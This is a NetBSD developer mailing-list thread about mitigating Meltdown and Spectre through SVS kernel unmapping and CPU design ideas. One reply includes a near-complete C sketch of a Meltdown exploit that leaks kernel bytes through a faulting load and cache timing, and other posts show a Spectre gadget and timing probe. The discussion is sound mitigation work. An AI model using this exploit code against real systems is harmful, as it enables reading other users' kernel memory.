Re: Current state of SVS and Meltdown

2018-01-30 Thread Mateusz Kocielski
On Sun, Jan 21, 2018 at 02:00:45PM +0100, Maxime Villard wrote:
> I committed this morning the last part needed to completely mitigate Meltdown
> on NetBSD-amd64. As I said in the commit message, we still need to change a
> few things for KASLR - there is some address leakage, and we need to hide one
> instruction - but otherwise the implementation should be perfectly
> functional.
> 
> You can enable it by uncommenting
> 
>   #options        SVS             # Separate Virtual Space
> 
> and building a GENERIC or GENERIC_KASLR kernel. Currently there is no dynamic
> detection - that is to say, if you enable SVS, it remains enabled even on AMD CPUs.
> As I said a few weeks ago I have a patch for that, but it's not in the tree
> yet.
> 
> My plan, once the dynamic detection is in, is to enable 'options SVS' by
> default. Then, when the kernel boots, if the CPU is not from Intel, SVS is
> disabled automatically (by either hotpatching or replacing the interrupt entry
> points). Once the system is up, the user will be able to disable SVS manually
> with a sysctl of the kind:
> 
>   # sysctl -w machdep.svs.enabled=0
> 
> This way, if you have an Intel CPU and you want good performance or don't
> care much about security, you will still be able to fall back to the default
> mode.
> 
> Unfortunately, the two Meltdown PoCs I tested on my i5 didn't work, even with
> SVS disabled. So I'm not able to verify that Meltdown is indeed mitigated
> entirely, but I am able to verify that userland runs with most of the kernel
> pages unmapped.
> 
> If someone with a functional PoC and vulnerable CPU could test SVS, that
> would be nice. For example the PoC Taylor sent on tech-kern a few days ago;
> it should be mitigated.
> 
> Also, it would be nice if someone familiar with x86 could proof-read the code
> I wrote, since it touches pretty critical places. Most of the code is at the
> end of [2], and the middle of [3] (SVS_* and TEXT_USER_*).

I've tested it using the following PoC: https://github.com/logicaltrust/meltdown
on cpu0: "Intel(R) Core(TM) i5-2500K CPU @ 3.30GHz". I can successfully
exploit this issue on an older kernel, but after applying your patches the bug
is gone (GENERIC with SVS enabled). Thanks for your work!

 Mateusz


Current state of SVS and Meltdown

2018-01-21 Thread Maxime Villard

I committed this morning the last part needed to completely mitigate Meltdown
on NetBSD-amd64. As I said in the commit message, we still need to change a
few things for KASLR - there is some address leakage, and we need to hide one
instruction - but otherwise the implementation should be perfectly functional.

You can enable it by uncommenting

#options        SVS             # Separate Virtual Space

and building a GENERIC or GENERIC_KASLR kernel. Currently there is no dynamic
detection - that is to say, if you enable SVS, it remains enabled even on AMD CPUs.
As I said a few weeks ago I have a patch for that, but it's not in the tree
yet.

My plan, once the dynamic detection is in, is to enable 'options SVS' by
default. Then, when the kernel boots, if the CPU is not from Intel, SVS is
disabled automatically (by either hotpatching or replacing the interrupt entry
points). Once the system is up, the user will be able to disable SVS manually
with a sysctl of the kind:

# sysctl -w machdep.svs.enabled=0

This way, if you have an Intel CPU and you want good performance or don't
care much about security, you will still be able to fall back to the default
mode.
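
To illustrate the dynamic detection part, here is a rough, userland-style
sketch of the kind of check I mean - not the actual patch, and the flag and
function names are invented:

/* Decide at boot whether SVS is needed, based on the CPUID vendor string.
 * Sketch only; the real code would hotpatch or swap the interrupt entry
 * points instead of just clearing a flag. */
#include <stdbool.h>
#include <string.h>
#include <cpuid.h>

static bool svs_enabled = true;     /* 'options SVS' compiled in */

static bool
cpu_is_intel(void)
{
    unsigned int eax, ebx, ecx, edx;
    char vendor[13];

    if (!__get_cpuid(0, &eax, &ebx, &ecx, &edx))
        return false;
    memcpy(vendor + 0, &ebx, 4);    /* vendor string order is EBX, EDX, ECX */
    memcpy(vendor + 4, &edx, 4);
    memcpy(vendor + 8, &ecx, 4);
    vendor[12] = '\0';
    return strcmp(vendor, "GenuineIntel") == 0;
}

static void
svs_autodetect(void)
{
    if (!cpu_is_intel())
        svs_enabled = false;        /* not from Intel: skip the SVS cost */
}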

Unfortunately, the two Meltdown PoCs I tested on my i5 didn't work, even with
SVS disabled. So I'm not able to verify that Meltdown is indeed mitigated
entirely, but I am able to verify that userland runs with most of the kernel
pages unmapped.

If someone with a functional PoC and vulnerable CPU could test SVS, that
would be nice. For example the PoC Taylor sent on tech-kern a few days ago;
it should be mitigated.

Also, it would be nice if someone familiar with x86 could proof-read the code
I wrote, since it touches pretty critical places. Most of the code is at the
end of [2], and the middle of [3] (SVS_* and TEXT_USER_*).

Please test, thanks,
Maxime

[1] http://mail-index.netbsd.org/source-changes/2018/01/21/msg091335.html
[2] https://nxr.netbsd.org/xref/src/sys/arch/amd64/amd64/machdep.c
[3] https://nxr.netbsd.org/xref/src/sys/arch/amd64/include/frameasm.h


Re: meltdown

2018-01-06 Thread Michael
Hello,

On Sat, 6 Jan 2018 07:33:50 +
m...@netbsd.org wrote:

> Loongson-2 had an issue where, due to branch prediction, it would prefetch
> instructions from the I/O area and deadlock.
> 
> This happened in normal usage, so we build the kernel with a binutils
> flag to output different jumps, and flush the BTB on kernel entry.*

I remember when we added support for those flags to our gcc & binutils.

> I wouldn't count on MIPS CPUs to hold up under the same level of scrutiny
> as x86 CPUs; luckily they're pretty obscure (and most probably aren't
> speculative).

Yeah, I doubt there are a lot of IRIX servers left, and embedded MIPS
is probably safe ;)

have fun
Michael


Re: meltdown

2018-01-06 Thread Mouse
>> Though of course "fail early" is an obvious principle to security
>> types, given the cost of aborting work in progress I can easily see
>> the opposite being true for CPU designers (I'm not one, so I don't
>> really know).  Which idiom (check permissions, then speculate /
>> speculate, then check permissions) is more common?
> No idea, one would think that failing early in order to avoid
> unnecessary resource usage would be useful.

Perhaps, but _not_ failing is a win if it turns out the spec ex is
confirmed instead of annulled.  And if the silicon would be sitting
idle otherwise, the only resource used is power.  (And die area, but
that's used in a static sense, not a dynamic sense.)

> Then again, the problem seems to be that not everything from the
> speculative path gets canceled / annulled, not so much that the
> speculation took place.

I agree.  For cache issues...it might be useful to freeze spec ex on a
cache miss.  Go ahead and service the cache miss, but keep the result
in a separate cache line, not part of the normal cache.  On annullment,
just drop it; on confirmation, push it into the normal cache and
unfreeze.  If you want to get really fancy, have multiple speculative
cache lines, kind of a small cache in front of the regular cache purely
for speculative use, and don't freeze speculation unless it fills up.
Though the spectre (ha ha) of coherency then raises its ugly head.
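
A toy software model of what I mean, just to pin down the commit/annul
behaviour (purely illustrative; real cache hardware looks nothing like C
structs and function pointers):

#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define LINE 64

/* One in-flight speculative fill; a real design would have several. */
struct spec_fill {
    uintptr_t tag;          /* line address */
    uint8_t   data[LINE];   /* data fetched by the speculative miss */
    bool      busy;
};

/* A miss caused by speculative execution fills this buffer only;
 * the regular cache is not touched yet. */
static void
spec_miss(struct spec_fill *f, uintptr_t tag, const uint8_t *mem)
{
    f->tag = tag;
    memcpy(f->data, mem, LINE);
    f->busy = true;
}

/* Speculation confirmed: only now is the line pushed into the regular
 * cache, via whatever routine installs lines there. */
static void
spec_commit(struct spec_fill *f, void (*install)(uintptr_t, const uint8_t *))
{
    if (f->busy)
        install(f->tag, f->data);
    f->busy = false;
}

/* Speculation annulled: just drop it; the regular cache never changed. */
static void
spec_annul(struct spec_fill *f)
{
    f->busy = false;
}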

Does anyone know how the typical time to service a cache miss compares
with the typical time to determine whether spec ex is annulled or
confirmed?  If the former is longer, or at least not much shorter, than
the latter, then this wouldn't even impair performance much in the miss
case.

Of course, this wouldn't do anything about covert channels other than
the cache.  But it'd stop anything using the cache for a covert channel
between spec ex and mainline code cold (meltdown and some variants of
spectre).  It's only a partial fix, but, for most purposes, that's
better than no fix.

Of course, some of the covert channels touched on in the spectre paper
are not fixable, such as power consumption and EMI generation;
fortunately, they are significantly harder to read from software.

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTML        mo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-05 Thread maya
On Sat, Jan 06, 2018 at 01:41:38AM -0500, Michael wrote:
> R10k had all sorts of weirdo speculative execution related problems
> (see hardware workarounds in the O2), and I doubt it's the first to
> implement it.

Loongson-2 had an issue where, due to branch prediction, it would prefetch
instructions from the I/O area and deadlock.

This happened in normal usage, so we build the kernel with a binutils
flag to output different jumps, and flush the BTB on kernel entry.*

I wouldn't count on MIPS CPUs to hold up under the same level of scrutiny
as x86 CPUs; luckily they're pretty obscure (and most probably aren't
speculative).

* https://sourceware.org/ml/binutils/2009-11/msg00387.html


Re: meltdown

2018-01-05 Thread Mouse
>> "Possibly more"?  Anything that does speculative execution needs a
>> good hard look, and that's damn near everything these days.
> I wonder about just "these days".  The potential for this kind of
> problem goes all the way back to STRETCH or the 6600, doesn't it?

I don't know; I don't know enough about either.

> Though of course "fail early" is an obvious principle to security
> types, given the cost of aborting work in progress I can easily see
> the opposite being true for CPU designers

I think it's less the cost of aborting work in progress and more the
(performance) cost of not keeping silicon busy all the time.

> (I'm not one, so I don't really know).

Me neither.  But it seems passing obvious to me that these hardware
bugs were at least partially driven by customer demand for performance.
And, to be sure, there are workloads for which neither meltdown nor
spectre is a significant risk, even if the hardware is vulnerable.

> Which idiom (check permissions, then speculate / speculate, then
> check permissions) is more common?

I don't know.  But the problem is only partially when permissions get
checked.  Consider spectre used by sandboxed code to read outside the
sandbox within a single process; this is doing nothing that, from the
hardware point of view, would violate permissions.  I could easily see
a CPU designer saying "So what's the problem if the code can read that
memory?  It can read it anytime it wants with a simple load anyway.".
The problem is also failure to roll back _all_ side effects when
annulling speculative execution.  (To be sure, even if that were done
it wouldn't fix quite the whole problem; closing one side-channel
doesn't necessarily close other side-channels.  But it would help.)
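
For concreteness, the in-process case has roughly the shape of the
variant-1 example in the spectre paper (a sketch, not a working exploit;
the array names echo the paper's example):

#include <stddef.h>
#include <stdint.h>

static uint8_t array1[16];
static size_t  array1_size = 16;
static uint8_t array2[256 * 4096];

/* idx is attacker-controlled and out of bounds, but after training the
 * predictor the bounds check is predicted to pass, so both loads run
 * speculatively and the value of array1[idx] leaks through the cache
 * state of array2 -- without any load ever violating page permissions. */
void
victim_function(size_t idx)
{
    if (idx < array1_size) {
        uint8_t v = array1[idx];
        (void)*(volatile uint8_t *)&array2[v * 4096];
    }
}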

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTML        mo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-05 Thread Thor Lancelot Simon
On Thu, Jan 04, 2018 at 04:58:30PM -0500, Mouse wrote:
> > As I understand it, on intel cpus and possibly more, we'll need to
> > unmap the kernel on userret, or else userland can read arbitrary
> > kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.

I wonder about just "these days".  The potential for this kind of problem
goes all the way back to STRETCH or the 6600, doesn't it?  If they had
memory permissions, which I frankly don't know.  And even in microprocessors
it's got to go back to... the end of the 1980s (R6000?), certainly the 1990s.

Though of course "fail early" is an obvious principle to security types,
given the cost of aborting work in progress I can easily see the
opposite being true for CPU designers (I'm not one, so I don't really
know).  Which idiom (check permissions, then speculate / speculate, then
check permissions) is more common?

Thor


RE: meltdown

2018-01-05 Thread Terry Moore
> I think you are confusing spectre and meltdown.

 

Yes, my apologies.

--Terry



Re: meltdown

2018-01-05 Thread Paul.Koning


> On Jan 4, 2018, at 6:01 PM, Warner Losh <i...@bsdimp.com> wrote:
> 
> 
> 
> On Thu, Jan 4, 2018 at 2:58 PM, Mouse <mo...@rodents-montreal.org> wrote:
> > As I understand it, on intel cpus and possibly more, we'll need to
> > unmap the kernel on userret, or else userland can read arbitrary
> > kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.
> 
> > Also, I understand that to exploit this, one has to attempt to access
> > kernel memory a lot, and SEGV at least once per bit.
> 
> I don't think so.  Traps that would be taken during normal execution
> are not taken during speculative execution.  The problem is, to quote
> one writeup I found, "Intel CPUs are allowed to access kernel memory
> when performing speculative execution, even when the application in
> question is running in user memory space.  The CPU does check to see if
> an invalid memory access occurs, but it performs the check after
> speculative execution, not before.".  This means that things like cache
> line loads can occur based on values the currently executing process
> should not be able to access; timing access to data that cache-collides
> with the cache lines of interest reveals the leaked bit(s).
> 
> Nowhere in there is a SEGV generated.
> 
> That's the meltdown stuff.  Spectre targets other things (I've seen
> branch prediction mentioned) to leak information around protection
> barriers.
> 
> I think you are confusing spectre and meltdown.
> 
> meltdown requires a sequence like:
> 
> exception (*0 = 0 or a = 1 / 0);
> do speculative read
> 
> to force a trip into kernel land just before the speculative read so that 
> otherwise not readable stuff gets (or does not get) read into cache which can 
> then be probed for data.

No, that's not correct.  You were being misled by the "Toy example".
The toy example demonstrates that speculative operations are done
after the point in the code that generates an exception, but in
itself it is NOT the exploit.

The exploit has the form:

x = read(secret_memory_location);
touch (cacheline[x]);
while (1) ;

The first line will SEGV, of course, but in the vulnerable CPUs
the speculative load is issued before that happens.  And also before
the SEGV happens, cacheline[x] is touched, making that line resident
in the cache.  This "transmits to the side channel".

Next, the SEGV happens.  The exploit catches that, and then it
does a timing test on references to cacheline[i] to see which i is
now resident.  That i is the value of x.
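
To make that shape concrete, here is a heavily simplified C sketch of such
an exploit (illustrative only: the names are invented, there is no retry or
threshold tuning, and it assumes x86-64 with GCC/Clang intrinsics):

#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <x86intrin.h>

#define SLOTS  256
#define STRIDE 4096             /* one page per slot, to defeat the prefetcher */

static uint8_t probe[SLOTS * STRIDE];
static sigjmp_buf env;

static void
on_segv(int sig)
{
    (void)sig;
    siglongjmp(env, 1);
}

static uint64_t
time_load(volatile uint8_t *p)
{
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

/* Try to leak one byte from kaddr; returns the most likely value. */
static int
leak_one_byte(const volatile uint8_t *kaddr)
{
    int i, best = 0;
    uint64_t t, best_t = (uint64_t)-1;

    signal(SIGSEGV, on_segv);

    for (i = 0; i < SLOTS; i++)     /* flush the side channel */
        _mm_clflush(&probe[i * STRIDE]);
    _mm_mfence();

    if (sigsetjmp(env, 1) == 0) {
        /* Architecturally this faults, but on a vulnerable CPU the
         * dependent load below may still run speculatively and pull
         * one probe slot into the cache before the fault is taken. */
        uint8_t x = *kaddr;
        (void)*(volatile uint8_t *)&probe[x * STRIDE];
    }

    /* "Receive": the slot that now loads fastest is the leaked byte. */
    for (i = 0; i < SLOTS; i++) {
        t = time_load(&probe[i * STRIDE]);
        if (t < best_t) {
            best_t = t;
            best = i;
        }
    }
    return best;
}

The caller simply runs leak_one_byte() in a loop over the kernel addresses
of interest.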

As the paper points out, it would be possible in principle to prefix
the exploit with

if (false) // predict_true

so the illegal read is also speculative, and is voided (exception
and all) when the wrong branch prediction is sorted out. But it
looks like the paper is saying that refinement has not been
demonstrated, though such branch prediction hacks have been shown
in other exploits.  Still, if that can be done, a test for
"SEGV too often" is no help.

The Meltdown paper clearly says that the KAISER fix cures this
vulnerability.  And while it doesn't say so, it is also clear that
the problem does not exist on CPUs where speculative memory references
do page protection checks.

All the above applies to Meltdown.  Spectre is unrelated in its
core mechanism.  The fact that both eventually end up using side
channels and were published at the same time seems to have caused
some confusion between the two.  It is important to understand they
are independent, stem from different underlying problems, apply
to a different set of vulnerable chips, and have different cures.

paul



Re: meltdown

2018-01-05 Thread maya
If there's anything this issue showed, it's that we definitely need fewer
people independently considering the issue and openly discussing their
own (occasionally wrong) suggestions.

It was just a suggestion, I'm not a source of authority.


Re: meltdown

2018-01-05 Thread Dave Huang
On Jan 4, 2018, at 15:22, Phil Nelson  wrote:
> How about turning on the workaround for any process that ignores
> or catches SEGV?  Any process that is terminated by a SEGV should
> be safe, shouldn't it?

Isn't there a suggested mitigation? Seems to me NetBSD should implement 
it as suggested, rather than coming up with its own special criteria 
for when to enable the workaround.
-- 
Name: Dave Huang |  Mammal, mammal / their names are called /
INet: k...@azeotrope.org |  they raise a paw / the bat, the cat /
Telegram: @DahanC |  dolphin and dog / koala bear and hog -- TMBG
Dahan: Hani G Y+C 42 Y++ L+++ W- C++ T++ A+ E+ S++ V++ F- Q+++ P+ B+ PA+ PL++



Re: meltdown

2018-01-05 Thread Phil Nelson
On Thursday 04 January 2018 12:49:22 m...@netbsd.org wrote:
> I wonder if we can count the number of SEGVs and if we get a few, turn
> on the workaround? 

How about turning on the workaround for any process that ignores
or catches SEGV?  Any process that is terminated by a SEGV should
be safe, shouldn't it?

--Phil

-- 
Phil Nelson, http://pcnelson.net



Re: meltdown

2018-01-04 Thread Paul.Koning


> On Jan 4, 2018, at 4:58 PM, Mouse <mo...@rodents-montreal.org> wrote:
> 
>> As I understand it, on intel cpus and possibly more, we'll need to
>> unmap the kernel on userret, or else userland can read arbitrary
>> kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.
> 
>> Also, I understand that to exploit this, one has to attempt to access
>> kernel memory a lot, and SEGV at least once per bit.
> 
> I don't think so.  Traps that would be taken during normal execution
> are not taken during speculative execution.  The problem is, to quote
> one writeup I found, "Intel CPUs are allowed to access kernel memory
> when performing speculative execution, even when the application in
> question is running in user memory space.  The CPU does check to see if
> an invalid memory access occurs, but it performs the check after
> speculative execution, not before.".  This means that things like cache
> line loads can occur based on values the currently executing process
> should not be able to access; timing access to data that cache-collides
> with the cache lines of interest reveals the leaked bit(s).
> 
> Nowhere in there is a SEGV generated.

That depends.  The straightforward case of Meltdown starts with an
illegal load, which the CPU will execute anyway speculatively, resulting
in downstream code execution that can be used to change the cache state.
In that form, the load eventually aborts.

There's a discussion in the paper that the load could be preceded by
a branch not taken that's predicted taken.  If so, the SEGV would indeed
not happen, but it isn't clear how feasible this is.

In any case, the problem would not occur in any CPU that does protection
checks prior to issuing speculative memory references.  

paul



Re: meltdown

2018-01-04 Thread Mouse
> As I understand it, on intel cpus and possibly more, we'll need to
> unmap the kernel on userret, or else userland can read arbitrary
> kernel memory.

"Possibly more"?  Anything that does speculative execution needs a good
hard look, and that's damn near everything these days.

> Also, I understand that to exploit this, one has to attempt to access
> kernel memory a lot, and SEGV at least once per bit.

I don't think so.  Traps that would be taken during normal execution
are not taken during speculative execution.  The problem is, to quote
one writeup I found, "Intel CPUs are allowed to access kernel memory
when performing speculative execution, even when the application in
question is running in user memory space.  The CPU does check to see if
an invalid memory access occurs, but it performs the check after
speculative execution, not before.".  This means that things like cache
line loads can occur based on values the currently executing process
should not be able to access; timing access to data that cache-collides
with the cache lines of interest reveals the leaked bit(s).

Nowhere in there is a SEGV generated.

That's the meltdown stuff.  Spectre targets other things (I've seen
branch prediction mentioned) to leak information around protection
barriers.
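
For concreteness, the timing part is easy to sketch on its own (x86-64 with
GCC/Clang intrinsics; the threshold is machine-dependent and the number here
is made up):

#include <stdint.h>
#include <x86intrin.h>

#define CACHED_THRESHOLD 80     /* cycles; tune per machine */

static uint64_t
access_time(volatile uint8_t *p)
{
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

/* Returns 1 if the byte at p appears to already be in the cache, i.e. if
 * something -- such as a speculatively executed load -- touched it earlier.
 * Typical use: _mm_clflush(p), run the suspect code, then call this. */
static int
was_cached(volatile uint8_t *p)
{
    return access_time(p) < CACHED_THRESHOLD;
}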

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTML        mo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-04 Thread maya
On Thu, Jan 04, 2018 at 10:01:34PM +0100, Kamil Rytarowski wrote:
> We have: PaX Segvguard. Can we mitigate it with this feature?
> 

that's what gave me the idea, but I think segvguard is per-binary, and I
could just make new binaries to keep on attacking the kernel.


Re: meltdown

2018-01-04 Thread Kamil Rytarowski
On 04.01.2018 21:49, m...@netbsd.org wrote:
> Also, I understand that to exploit this, one has to attempt to access
> kernel memory a lot, and SEGV at least once per bit.
> 
> I wonder if we can count the number of SEGVs and if we get a few, turn
> on the workaround? that would at least spare us the performance penalty
> for normal code.
> 

We have: PaX Segvguard. Can we mitigate it with this feature?





meltdown

2018-01-04 Thread maya
Yo.

As I understand it, on intel cpus and possibly more, we'll need to unmap
the kernel on userret, or else userland can read arbitrary kernel
memory.

People seem to be mentioning a 50% performance penalty and we might do
worse (we don't have vDSOs...)

Also, I understand that to exploit this, one has to attempt to access
kernel memory a lot, and SEGV at least once per bit.

I wonder if we can count the number of SEGVs and if we get a few, turn
on the workaround? that would at least spare us the performance penalty
for normal code.
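
Roughly what I have in mind, as a sketch only (the names are invented, and
whether counting SEGVs is even the right trigger is exactly the question):

#include <stdbool.h>

#define SEGV_THRESHOLD 16           /* arbitrary */

/* Stand-in for the real per-process structure. */
struct proc_sketch {
    unsigned segv_count;
    bool     kernel_unmapped;       /* take the expensive return path */
};

/* Called from SIGSEGV delivery (sketch only). */
static void
segv_heuristic(struct proc_sketch *p)
{
    if (++p->segv_count >= SEGV_THRESHOLD)
        p->kernel_unmapped = true;
}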